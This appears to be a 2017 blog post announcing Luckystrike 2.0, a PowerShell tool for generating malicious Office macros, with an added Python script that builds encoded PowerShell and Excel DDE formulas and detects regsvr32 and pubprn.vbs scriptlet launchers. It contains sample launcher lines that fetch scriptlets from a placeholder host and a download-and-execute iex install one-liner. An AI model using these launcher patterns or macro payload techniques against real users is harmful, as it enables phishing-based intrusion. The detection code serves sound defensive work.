Sunday, July 23, 2017

Luckystrike 2.0 is here!

tl;dr: Luckystrike is an open-source evil-macro generation utility written in PowerShell, originally released at DerbyCon 6.0. This release adds Word support and new attacks.

Code is here.
Original blog post here.
DerbyCon talk here (the Luckystrike segment begins at 18:45)

New Features:

  1. Full support for Microsoft Word output (.doc), as well as Word-based template storage.
  2. Support for Invoke-Obfuscation of PowerShell-based payloads as well as PowerShell shell commands (e.g. powershell -nop -enc ...)
  3. New Payload Type: COM Scriptlets. Takes a URL that points to your scriptlet and fires it via one of the following Infection Types (based on @subTee's excellent research):
    1. Pubprn.vbs - Example
    2. Regsvr32 - Example
  4. Excel DDE Infection Type added: Research. Note that DDE runs the first word of your Shell Command payload as the program it launches, so put the executable first and its arguments after it.
  5. A truckload of bug fixes
  6. Luckystrike's -API switch lets you drive it from scripts. See my Pester script for examples.
  7. I have also filled out the wiki to make it easier to get assistance.
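As an added example (not code from Luckystrike or from the post's author), the Python script below shows what the payload shapes in the list above look like once they leave the document, and how a defender would recover the interesting part of each from a captured process command line: the UTF-16LE base64 that powershell -enc carries, an Excel DDE formula built from a Shell Command (the first word becomes the program DDE launches), and the regsvr32 / pubprn.vbs scriptlet launch lines, followed by a small classifier that pulls out the scriptlet URL or the decoded PowerShell. The sample command lines, the URLs and the exact DDE cell template are constructed for illustration and are assumptions, not Luckystrike's own output.

```python
"""Added example, not part of Luckystrike or the original post.

Shows the on-the-wire shapes behind the feature list above and how to
recover the interesting part of each from a captured process command
line.  Everything under SAMPLE_COMMAND_LINES is constructed for
illustration; the URLs are placeholders, not real payloads.
"""
import base64
import binascii
import re
from typing import Optional, Tuple


def encode_powershell_command(script: str) -> str:
    """Value that powershell -enc / -EncodedCommand expects: base64 of the
    script encoded as UTF-16LE (not UTF-8)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell_command(b64: str) -> str:
    """Inverse of encode_powershell_command, for triage of captured commands."""
    return base64.b64decode(b64).decode("utf-16-le")


def dde_formula(shell_command: str, cell: str = "A0") -> str:
    """Excel DDE formula of the form =application|topic!item.

    The first word of the Shell Command becomes the DDE application, i.e.
    the program Excel launches; the remainder is the topic.  This mirrors
    the note above that the first word of the payload is what DDE runs.
    The exact cell template Luckystrike emits is not shown on the page,
    so this layout is an assumption.
    """
    app, _, rest = shell_command.strip().partition(" ")
    return f"={app}|'{rest}'!{cell}"


# Patterns for the infection types listed above as they appear in process
# command lines.  The scriptlet URL is captured in the "url" group, the
# encoded PowerShell in "b64".
REGSVR32_SCRIPTLET = re.compile(
    r"regsvr32(?:\.exe)?\b.*?/i:(?P<url>\S+).*?\bscrobj\.dll", re.I)
PUBPRN_SCRIPTLET = re.compile(
    r"pubprn\.vbs\b.*?\bscript:(?P<url>\S+)", re.I)
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
POWERSHELL_ENCODED = re.compile(
    r"powershell(?:\.exe)?\b.*?\s-(?:e|ec|en[a-z]*)\s+(?P<b64>[A-Za-z0-9+/=]{8,})",
    re.I)


def classify(cmdline: str) -> Optional[Tuple[str, str]]:
    """Return (label, detail) for a suspicious command line, else None.

    detail is the scriptlet URL for the COM-scriptlet launchers and the
    decoded script for an encoded PowerShell command (the raw base64 if
    it does not decode cleanly).
    """
    m = REGSVR32_SCRIPTLET.search(cmdline)
    if m:
        return ("regsvr32 scriptlet", m.group("url"))
    m = PUBPRN_SCRIPTLET.search(cmdline)
    if m:
        return ("pubprn.vbs scriptlet", m.group("url"))
    m = POWERSHELL_ENCODED.search(cmdline)
    if m:
        try:
            return ("powershell encoded command",
                    decode_powershell_command(m.group("b64")))
        except (binascii.Error, UnicodeDecodeError):
            return ("powershell encoded command", m.group("b64"))
    return None


# Constructed sample command lines (placeholders, not real payloads).
SAMPLE_COMMAND_LINES = [
    "regsvr32.exe /s /n /u /i:https://example.invalid/payload.sct scrobj.dll",
    "cscript.exe //nologo C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\pubprn.vbs "
    "127.0.0.1 script:https://example.invalid/payload.sct",
    "powershell.exe -nop -w hidden -enc " + encode_powershell_command("calc"),
    "notepad.exe C:\\Users\\alice\\notes.txt",
]


def triage(cmdlines=SAMPLE_COMMAND_LINES):
    """Classify each command line; benign lines map to None."""
    return [classify(c) for c in cmdlines]


if __name__ == "__main__":
    print(dde_formula("powershell -nop -w hidden -enc " + encode_powershell_command("calc")))
    for line, verdict in zip(SAMPLE_COMMAND_LINES, triage()):
        print(verdict, "<-", line)
```

The encoder is what makes the Invoke-Obfuscation item above matter in practice: an encoded command hides nothing from anyone who decodes it, so obfuscation of the script body is what keeps the decoded result from being a one-line signature. The classifier deliberately keys on the launcher shapes (the /i: URL plus scrobj.dll, the script: moniker handed to pubprn.vbs) rather than on any payload content, which is also why these two infection types are worth logging on the process-creation side regardless of how the macro itself is obfuscated.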

First-time Installation


I highly encourage you to read the wiki before installing, but if you're antsy, you can install with this PowerShell command (run from an elevated/admin PowerShell prompt). Note that the one-liner downloads and immediately executes the installer script with iex, so read what is at that URL before you run it:

iex (new-object net.webclient).downloadstring('https://git.io/v7kbp')

Upgrading


Normally Luckystrike prompts you when an upgrade is available. However, I have just moved to a new repo, which breaks that check. The easiest option is a fresh install, but if you have templates or payloads you want to preserve, you can upgrade by opening luckystrike.ps1 in an editor and changing the old repo location to the new one. Once you save, close and relaunch, Luckystrike will pick up the changes from the new repo and prompt you to upgrade.

Old Repo:


New Repo:



Getting Help


If you encounter an error or need other assistance, run Luckystrike with the -Debug switch. It creates a debug log that you must attach to your GitHub issue; without it, you can expect me not to respond!

I do not offer help in making payloads. Please stop asking.

Credits


Huge thanks to Casey Smith for continuing to put out awesome research, Daniel Bohannon for incredible obfuscation work, and Steve McKenzie for help testing and git-fu. <3 you guys!

2 comments:

  1. Have been eagerly awaiting Word doc capability :) , but getting COM scriptlet and Excel DDE support is terrific. And of course Invoke-Obfuscation built-in...a very nice release. Can't wait to fire it up in the lab!

    1. Thanks! By all means get in touch with me on twitter/github to let me know how things work out! Feedback is always appreciated.

      @curi0usJack
